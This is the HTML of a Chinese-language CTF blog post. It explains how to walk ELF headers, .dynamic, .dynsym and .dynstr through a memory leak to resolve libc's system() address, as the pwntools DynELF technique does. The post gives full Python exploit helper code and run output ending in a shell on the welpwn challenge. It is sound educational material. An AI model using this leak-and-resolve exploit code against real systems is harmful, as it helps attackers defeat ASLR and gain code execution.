<!doctype html>



  


<html class="theme-next pisces use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="ELF,memory-leak," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description" content="前言前几天写rctf-qual-2015-welpwn的时候用了DynELF模块。那时不用libc-database的原因是担心有时libc会找不到。
用DynELF写exploit的时候遇到了不少麻烦（最终解决了），所以还是希望能理解一下DynELF寻找函数加载地址的原理，恰好前几天看到了一篇这篇文章[1]，理解了原理后，今天自己动手尝试了一下，顺便记录。
正文0x0 说明
以x86-64为例以">
<meta property="og:type" content="article">
<meta property="og:title" content="泄漏ELF共享对象基址重置后内部函数的地址">
<meta property="og:url" content="http://0byjwzsf.me/2016/09/09/find_function/index.html">
<meta property="og:site_name" content="Icemakr's Blog">
<meta property="og:description" content="前言前几天写rctf-qual-2015-welpwn的时候用了DynELF模块。那时不用libc-database的原因是担心有时libc会找不到。
用DynELF写exploit的时候遇到了不少麻烦（最终解决了），所以还是希望能理解一下DynELF寻找函数加载地址的原理，恰好前几天看到了一篇这篇文章[1]，理解了原理后，今天自己动手尝试了一下，顺便记录。
正文0x0 说明
以x86-64为例以">
<meta property="og:updated_time" content="2016-09-09T11:47:49.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="泄漏ELF共享对象基址重置后内部函数的地址">
<meta name="twitter:description" content="前言前几天写rctf-qual-2015-welpwn的时候用了DynELF模块。那时不用libc-database的原因是担心有时libc会找不到。
用DynELF写exploit的时候遇到了不少麻烦（最终解决了），所以还是希望能理解一下DynELF寻找函数加载地址的原理，恰好前几天看到了一篇这篇文章[1]，理解了原理后，今天自己动手尝试了一下，顺便记录。
正文0x0 说明
以x86-64为例以">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>




  <link rel="canonical" href="http://0byjwzsf.me/2016/09/09/find_function/"/>

  <title> 泄漏ELF共享对象基址重置后内部函数的地址 | Icemakr's Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  



  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?5ae83853fc19f40e51b4490ceb76aa1d";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>








  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Icemakr's Blog</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">focus your minds</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="st-search-show-outputs">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <form class="site-search-form">
  <input type="text" id="st-search-input" class="st-search-input st-default-search-input" />
</form>

<script type="text/javascript">
  (function(w,d,t,u,n,s,e){w['SwiftypeObject']=n;w[n]=w[n]||function(){
    (w[n].q=w[n].q||[]).push(arguments);};s=d.createElement(t);
    e=d.getElementsByTagName(t)[0];s.async=1;s.src=u;e.parentNode.insertBefore(s,e);
  })(window,document,'script','//s.swiftypecdn.com/install/v2/st.js','_st');

  _st('install', 'Rp7ZqqNxwbocZekuUGSB','2.0.0');
</script>



    </div>
  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                泄漏ELF共享对象基址重置后内部函数的地址
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-09-09T00:00:00+08:00" content="2016-09-09">
              2016-09-09
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/Articles/" itemprop="url" rel="index">
                    <span itemprop="name">Articles</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2016/09/09/find_function/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2016/09/09/find_function/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="前言">前言</h1><p>前几天写<a href="http://0byjwzsf.me/2016/09/05/rctf-qual-2015-welpwn/">rctf-qual-2015-welpwn</a>的时候用了<strong><em>DynELF</em></strong>模块。那时不用<strong><em>libc-database</em></strong>的原因是担心有时libc会找不到。</p>
<p>用<strong><em>DynELF</em></strong>写exploit的时候遇到了不少麻烦（最终解决了），所以还是希望能理解一下<strong><em>DynELF</em></strong>寻找函数加载地址的原理，恰好前几天看到了一篇这篇文章<a href="http://uaf.io/exploitation/misc/2016/04/02/Finding-Functions.html" target="_blank" rel="external">[1]</a>，理解了原理后，今天自己动手尝试了一下，顺便记录。</p>
<h1 id="正文">正文</h1><h2 id="0x0_说明">0x0 说明</h2><blockquote>
<p>以x86-64为例<br>以寻找libc中函数为例</p>
</blockquote>
<h2 id="0x1_寻找ELF文件动态加载的基址">0x1 寻找ELF文件动态加载的基址</h2><p>首先看一下<a href="https://github.com/bminor/glibc/blob/master/elf/elf.h#L87" target="_blank" rel="external">ELF文件头</a>，文件头的第一个成员就是魔数(Magic)，其开头为<code>&quot;\x7fELF&quot;</code>，我们可以根据它来确定ELF加载的基址。</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">char</span>	e_ident[EI_NIDENT];	<span class="comment">/* Magic number and other info */</span></span><br><span class="line"></span><br><span class="line">  ... ...</span><br><span class="line"></span><br><span class="line">&#125; Elf64_Ehdr;</span><br></pre></td></tr></table></figure>
<p>在寻找加载后基址前，我们首先要泄露出这个ELF文件加载入内存后其中的某个函数的地址。这个地址容易泄露，只要泄露<code>GOT表</code>中某个已经调用过的函数即可，这里我们选取<code>write</code>函数(0x7f048c08e860)</p>
<p>然后舍弃泄露出来的地址的最后12位（ELF文件加载地址是页对齐的），得到<code>0x7f048c08e000</code>，对这个地址不断减0x1000，然后泄露其开始的4个字节，直到于Magic的头4个字节匹配为止。即可得到ELF文件加载的基址(0x7f048bfa3000)</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># get arbitrary address located in libc</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_elf_entry</span><span class="params">(got)</span>:</span></span><br><span class="line">    entry = l64(leak(got, <span class="number">0x8</span>))</span><br><span class="line">    <span class="keyword">print</span> <span class="string">'[+] libc entry\t\t\t\t:\t0x%x'</span> % entry</span><br><span class="line">    <span class="keyword">return</span> entry</span><br><span class="line"></span><br><span class="line"><span class="comment"># find libc base according to Magic</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_elf_base</span><span class="params">(entry)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> BITS == <span class="number">64</span>:</span><br><span class="line">        libc_base = entry &amp; <span class="number">0xfffffffffffff000</span></span><br><span class="line">        <span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">            garbage = leak(libc_base, <span class="number">0x4</span>)</span><br><span class="line">            <span class="keyword">if</span> garbage == <span class="string">'\x7fELF'</span>:</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            libc_base -= <span class="number">0x1000</span></span><br><span class="line">        <span class="keyword">print</span> <span class="string">'[+] libc base\t\t\t\t:\t0x%x'</span> % libc_base</span><br><span class="line">        <span class="keyword">return</span> libc_base</span><br></pre></td></tr></table></figure>
<h2 id="0x02_寻找DYNAMIC段">0x02 寻找<em>DYNAMIC</em>段</h2><p><em>DYNAMIC</em>段中存储着<code>.dynamic</code>section，它与动态链接有关的section，我们需要找到它的位置</p>
<p>首先要找程序头表(Promgram Header Table)，再看一下<a href="https://github.com/bminor/glibc/blob/master/elf/elf.h#L92" target="_blank" rel="external">ELF文件头</a><code>e_phoff</code>成员存储该ELF文件载入内存后的程序头表在虚拟内存中的相对地址，其<code>绝对地址 = elf_base + 相对地址</code>（elf_base为ELF文件的基址，在上面已求得），易求得，libc程序头表绝对地址为<code>0x7f048bfa3000 + 0x40 = 0x7f048bfa3040</code></p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">  ... ...</span><br><span class="line"></span><br><span class="line">  Elf64_Off	e_phoff;		<span class="comment">/* Program header table file offset */</span></span><br><span class="line"></span><br><span class="line">  ... ...</span><br><span class="line"></span><br><span class="line">&#125; Elf64_Ehdr;</span><br></pre></td></tr></table></figure>
<p>解释一下程序头表的结构，它是一个结构体数组，每一个结构体是一个<code>segment header</code>，<a href="https://github.com/bminor/glibc/blob/master/elf/elf.h#L690" target="_blank" rel="external">结构体</a>定义如下，我们需要了解的就是<code>p_type</code>和<code>p_vaddr</code>成员，<code>p_type</code>代表segment的类型，<code>p_vaddr</code>存储的是该段的虚拟地址</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">  Elf64_Word	p_type;			<span class="comment">/* Segment type */</span></span><br><span class="line"></span><br><span class="line">  ... ...</span><br><span class="line"></span><br><span class="line">  Elf64_Addr	p_vaddr;		<span class="comment">/* Segment virtual address */</span></span><br><span class="line"></span><br><span class="line">  ... ...</span><br><span class="line"></span><br><span class="line">&#125; Elf64_Phdr;</span><br></pre></td></tr></table></figure>
<p>我们要找的<em>DYNAMIC</em>段的<code>p_type</code>为0x2，根据这个就可以找到<em>DYNAMIC</em>段的<code>segment header</code>，然后查询该头的<code>p_vaddr</code>成员，，由于我机器上的libc为PIC(通过<code>readelf -d libc.so | grep TEXTREL</code>可判断是否为PIC），该虚拟地址代表的是相对虚拟地址，实际虚拟地址还需要加上<code>libc_base</code>，易求得为<code>0x7f048c360ba0</code></p>
<p>由此，我们已经得到了<em>DYNAMIC</em>段的虚拟地址，通过<code>readelf</code>容易看到，这个segment中只有<code>.dynamic</code>这一个section被映射进来，因此<br>我们得到的这个地址也是<code>.dynamic</code>映射进来后的虚拟地址</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># find program header table</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_phdr</span><span class="params">(elf_base)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> BITS == <span class="number">64</span>:</span><br><span class="line">        <span class="comment"># get address of program header table</span></span><br><span class="line">        phdr = l64(leak(elf_base + <span class="number">0x20</span>, <span class="number">0x8</span>)) + elf_base</span><br><span class="line">        <span class="keyword">print</span> <span class="string">'[+] program headers table\t\t:\t0x%x'</span> % phdr</span><br><span class="line">        <span class="keyword">return</span> phdr</span><br><span class="line"></span><br><span class="line"><span class="comment"># find dynamic section table (.dynamic section -&gt; DYNAMIC segment)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_dyn_section</span><span class="params">(phdr, elf_base)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> BITS == <span class="number">64</span>:</span><br><span class="line">        phdr_ent = phdr</span><br><span class="line">        <span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">            garbage = l32(leak(phdr_ent, <span class="number">0x4</span>))</span><br><span class="line">            <span class="comment"># p_type of dynamic segment is 0x2</span></span><br><span class="line">            <span class="keyword">if</span> garbage == <span class="number">0x2</span>:</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            phdr_ent += <span class="number">0x38</span></span><br><span class="line">        dyn_section = l64(leak(phdr_ent + <span class="number">0x10</span>, <span class="number">0x8</span>)) + elf_base</span><br><span class="line">        <span class="keyword">print</span> <span class="string">'[+] .dynamic section headers table\t:\t0x%x'</span> % dyn_section</span><br><span class="line">        <span class="keyword">return</span> dyn_section</span><br></pre></td></tr></table></figure>
<h2 id="0x03_寻找动态链接符号表(-dynsym)和动态链接字符串表(-dynstr)">0x03 寻找<em>动态链接符号表</em>(.dynsym)和<em>动态链接字符串表</em>(.dynstr)</h2><p><code>.dynamic</code>段也是一个结构体数组，<a href="https://github.com/bminor/glibc/blob/master/elf/elf.h#L800" target="_blank" rel="external">结构体</a>的定义如下，它含有与动态链接有关的section的信息，其中<code>d_tag</code>成员代表不同的section，后面的<code>d_un</code>联合体用来代表大小或者是地址</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">  Elf64_Sxword	d_tag;			<span class="comment">/* Dynamic entry type */</span></span><br><span class="line">  <span class="keyword">union</span></span><br><span class="line">    &#123;</span><br><span class="line">      Elf64_Xword d_val;		<span class="comment">/* Integer value */</span></span><br><span class="line">      Elf64_Addr d_ptr;			<span class="comment">/* Address value */</span></span><br><span class="line">    &#125; d_un;</span><br><span class="line">&#125; Elf64_Dyn;</span><br></pre></td></tr></table></figure>
<p>我们要找的<em>动态链接符合表</em>(DT_SYMTAB)和<em>动态链接字符串表</em>(DT_STRTAB)的<code>d_tag</code>值分别为0x6和0x5，其分别对应的<code>d_un</code>值即为相对应的虚拟地址(0x7f048c360ba0和0x7f048bfa6d28)</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_sym_str_table</span><span class="params">(dyn_section)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> BITS == <span class="number">64</span>:</span><br><span class="line">        dyn_ent = dyn_section</span><br><span class="line">        dt_sym_tab = <span class="number">0x0</span></span><br><span class="line">        dt_str_tab = <span class="number">0x0</span></span><br><span class="line">        <span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">            garbage = l64(leak(dyn_ent, <span class="number">0x8</span>))</span><br><span class="line">            <span class="keyword">if</span> garbage == <span class="number">0x6</span>:</span><br><span class="line">                dt_sym_tab = l64(leak(dyn_ent + <span class="number">0x8</span>, <span class="number">0x8</span>))</span><br><span class="line">            <span class="keyword">elif</span> garbage == <span class="number">0x5</span>:</span><br><span class="line">                dt_str_tab = l64(leak(dyn_ent + <span class="number">0x8</span>, <span class="number">0x8</span>))</span><br><span class="line">            <span class="keyword">if</span> dt_str_tab <span class="keyword">and</span> dt_sym_tab:</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            dyn_ent += <span class="number">0x10</span></span><br><span class="line">        <span class="keyword">print</span> <span class="string">'[+] symtab\t\t\t\t:\t0x%x'</span> % dt_sym_tab</span><br><span class="line">        <span class="keyword">print</span> <span class="string">'[+] strtab\t\t\t\t:\t0x%x'</span> % dt_str_tab</span><br><span class="line">        <span class="keyword">return</span> (dt_sym_tab, dt_str_tab)</span><br></pre></td></tr></table></figure>
<h2 id="0x04">0x04</h2><p>至此，我们已经找到了<code>.dynsym</code>和<code>.dynstr</code>，再解释一下<code>.dynsym</code>的结构，他是一个结构体数组，每个<a href="https://github.com/bminor/glibc/blob/master/elf/elf.h#L528" target="_blank" rel="external">结构体</a>定义如下，其中<code>st_name</code>的值，为该符号所对应的符合名字符串在<code>.dynstr</code>中的偏移，<code>st_value</code>为该符号的相对地址，该相对地址加上<code>libc_base</code>即为该符号对应的实际地址</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">  Elf64_Word	st_name;		<span class="comment">/* Symbol name (string tbl index) */</span></span><br><span class="line"></span><br><span class="line">  ... ...</span><br><span class="line"></span><br><span class="line">  Elf64_Addr	st_value;		<span class="comment">/* Symbol value */</span></span><br><span class="line"></span><br><span class="line">  ... ...</span><br><span class="line"></span><br><span class="line">&#125; Elf64_Sym;</span><br></pre></td></tr></table></figure>
<p>因此我们要做的就是遍历<code>.dynsym</code>表，然后在<code>.dynstr</code>中查找对应字符串，与我们的目标函数名字符串进行对比，直到匹配为止，就此得到我们的目标函数在符号表内的位置，其<code>st_value</code>值加上<code>libc_base</code>就得到了函数的地址了！</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_func_adr</span><span class="params">(dt_sym_tab, dt_str_tab, func, elf_base)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> BITS == <span class="number">64</span>:</span><br><span class="line">        sym_ent = dt_sym_tab</span><br><span class="line">        <span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">            garbage = l32(leak(sym_ent, <span class="number">0x4</span>))</span><br><span class="line">            name    = leak(dt_str_tab + garbage, len(func))</span><br><span class="line">            <span class="keyword">if</span> name == func:</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            sym_ent += <span class="number">0x18</span></span><br><span class="line">        adr_func = l64(leak(sym_ent + <span class="number">0x8</span>, <span class="number">0x8</span>)) + elf_base</span><br><span class="line">        <span class="keyword">print</span> <span class="string">'[+] %s loaded address\t:\t0x%x'</span> % (func, adr_func)</span><br><span class="line">        <span class="keyword">return</span> adr_func</span><br></pre></td></tr></table></figure>
<h1 id="代码">代码</h1><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># manual leak libc</span></span><br><span class="line">BITS = <span class="number">64</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># get arbitrary address located in libc</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_elf_entry</span><span class="params">(got)</span>:</span></span><br><span class="line">    entry = l64(leak(got, <span class="number">0x8</span>))</span><br><span class="line">    <span class="keyword">print</span> <span class="string">'[+] libc entry\t\t\t\t:\t0x%x'</span> % entry</span><br><span class="line">    <span class="keyword">return</span> entry</span><br><span class="line"></span><br><span class="line"><span class="comment"># find libc base according to Magic</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_elf_base</span><span class="params">(entry)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> BITS == <span class="number">64</span>:</span><br><span class="line">        libc_base = entry &amp; <span class="number">0xfffffffffffff000</span></span><br><span class="line">        <span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">            garbage = leak(libc_base, <span class="number">0x4</span>)</span><br><span class="line">            <span class="keyword">if</span> garbage == <span class="string">'\x7fELF'</span>:</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            libc_base -= <span class="number">0x1000</span></span><br><span class="line">        <span class="keyword">print</span> <span class="string">'[+] libc base\t\t\t\t:\t0x%x'</span> % libc_base</span><br><span class="line">        <span class="keyword">return</span> libc_base</span><br><span class="line"></span><br><span class="line"><span class="comment"># find program header table</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_phdr</span><span class="params">(elf_base)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> BITS == <span class="number">64</span>:</span><br><span class="line">        <span class="comment"># get address of program header table</span></span><br><span class="line">        phdr = l64(leak(elf_base + <span class="number">0x20</span>, <span class="number">0x8</span>)) + elf_base</span><br><span class="line">        <span class="keyword">print</span> <span class="string">'[+] program headers table\t\t:\t0x%x'</span> % phdr</span><br><span class="line">        <span class="keyword">return</span> phdr</span><br><span class="line"></span><br><span class="line"><span class="comment"># find dynamic section table (.dynamic section -&gt; DYNAMIC segment)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_dyn_section</span><span class="params">(phdr, elf_base)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> BITS == <span class="number">64</span>:</span><br><span class="line">        phdr_ent = phdr</span><br><span class="line">        <span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">            garbage = l32(leak(phdr_ent, <span class="number">0x4</span>))</span><br><span class="line">            <span class="comment"># p_type of dynamic segment is 0x2</span></span><br><span class="line">            <span class="keyword">if</span> garbage == <span class="number">0x2</span>:</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            phdr_ent += <span class="number">0x38</span></span><br><span class="line">        dyn_section = l64(leak(phdr_ent + <span class="number">0x10</span>, <span class="number">0x8</span>)) + elf_base</span><br><span class="line">        <span class="keyword">print</span> <span class="string">'[+] .dynamic section headers table\t:\t0x%x'</span> % dyn_section</span><br><span class="line">        <span class="keyword">return</span> dyn_section</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_sym_str_table</span><span class="params">(dyn_section)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> BITS == <span class="number">64</span>:</span><br><span class="line">        dyn_ent = dyn_section</span><br><span class="line">        dt_sym_tab = <span class="number">0x0</span></span><br><span class="line">        dt_str_tab = <span class="number">0x0</span></span><br><span class="line">        <span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">            garbage = l64(leak(dyn_ent, <span class="number">0x8</span>))</span><br><span class="line">            <span class="keyword">if</span> garbage == <span class="number">0x6</span>:</span><br><span class="line">                dt_sym_tab = l64(leak(dyn_ent + <span class="number">0x8</span>, <span class="number">0x8</span>))</span><br><span class="line">            <span class="keyword">elif</span> garbage == <span class="number">0x5</span>:</span><br><span class="line">                dt_str_tab = l64(leak(dyn_ent + <span class="number">0x8</span>, <span class="number">0x8</span>))</span><br><span class="line">            <span class="keyword">if</span> dt_str_tab <span class="keyword">and</span> dt_sym_tab:</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            dyn_ent += <span class="number">0x10</span></span><br><span class="line">        <span class="keyword">print</span> <span class="string">'[+] symtab\t\t\t\t:\t0x%x'</span> % dt_sym_tab</span><br><span class="line">        <span class="keyword">print</span> <span class="string">'[+] strtab\t\t\t\t:\t0x%x'</span> % dt_str_tab</span><br><span class="line">        <span class="keyword">return</span> (dt_sym_tab, dt_str_tab)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_func_adr</span><span class="params">(dt_sym_tab, dt_str_tab, func, elf_base)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> BITS == <span class="number">64</span>:</span><br><span class="line">        sym_ent = dt_sym_tab</span><br><span class="line">        <span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">            garbage = l32(leak(sym_ent, <span class="number">0x4</span>))</span><br><span class="line">            name    = leak(dt_str_tab + garbage, len(func))</span><br><span class="line">            <span class="keyword">if</span> name == func:</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            sym_ent += <span class="number">0x18</span></span><br><span class="line">        adr_func = l64(leak(sym_ent + <span class="number">0x8</span>, <span class="number">0x8</span>)) + elf_base</span><br><span class="line">        <span class="keyword">print</span> <span class="string">'[+] %s loaded address\t:\t0x%x'</span> % (func, adr_func)</span><br><span class="line">        <span class="keyword">return</span> adr_func</span><br><span class="line"></span><br><span class="line"><span class="comment"># exploit ELF</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">lookup</span><span class="params">(func)</span>:</span></span><br><span class="line">    entry                   = get_elf_entry(got_write)</span><br><span class="line">    elf_base                = find_elf_base(entry)</span><br><span class="line">    phdr                    = find_phdr(elf_base)</span><br><span class="line">    dyn_section             = find_dyn_section(phdr, elf_base)</span><br><span class="line">    dt_sym_tab, dt_str_tab  = find_sym_str_table(dyn_section)</span><br><span class="line">    func_address            = find_func_adr(dt_sym_tab, dt_str_tab, func, elf_base)</span><br><span class="line">    <span class="keyword">return</span> func_address</span><br></pre></td></tr></table></figure>
<h2 id="get_shell">get shell</h2><figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line">ctf:...-<span class="number">2015</span>/rctf-qual-<span class="number">2015</span>-welpwn&gt; python exp_manu.py                                                       (master✱)</span><br><span class="line">[+] libc entry				        :	<span class="number">0x7f048c08e860</span></span><br><span class="line">[+] libc base				        :	<span class="number">0x7f048bfa3000</span></span><br><span class="line">[+] program headers table		    :	<span class="number">0x7f048bfa3040</span></span><br><span class="line">[+] .dynamic section headers table	:	<span class="number">0x7f048c360ba0</span></span><br><span class="line">[+] symtab				            :	<span class="number">0x7f048bfa6d28</span></span><br><span class="line">[+] strtab				            :	<span class="number">0x7f048bfb3d78</span></span><br><span class="line">[+] __libc_system loaded address	:	<span class="number">0x7f048bfe9640</span></span><br><span class="line"></span><br><span class="line">id</span><br><span class="line">uid=<span class="number">1000</span>(ctf) gid=<span class="number">999</span>(admin) groups=<span class="number">999</span>(admin)</span><br></pre></td></tr></table></figure>
<h1 id="Reference">Reference</h1><ol>
<li><a href="http://uaf.io/exploitation/misc/2016/04/02/Finding-Functions.html" target="_blank" rel="external">http://uaf.io/exploitation/misc/2016/04/02/Finding-Functions.html</a></li>
</ol>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ELF/" rel="tag">#ELF</a>
          
            <a href="/tags/memory-leak/" rel="tag">#memory-leak</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/09/08/bctf-qual-2016-bcloud/" rel="next" title="bctf-qual-2016-bcloud">
                <i class="fa fa-chevron-left"></i> bctf-qual-2016-bcloud
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2016/09/09/find_function/"
           data-title="泄漏ELF共享对象基址重置后内部函数的地址" data-url="http://0byjwzsf.me/2016/09/09/find_function/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/author.jpg"
               alt="Icemakr" />
          <p class="site-author-name" itemprop="name">Icemakr</p>
          <p class="site-description motion-element" itemprop="description">感觉至上的梦想家</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">32</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">5</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">37</span>
                <span class="site-state-item-name">标签</span>
              </a>
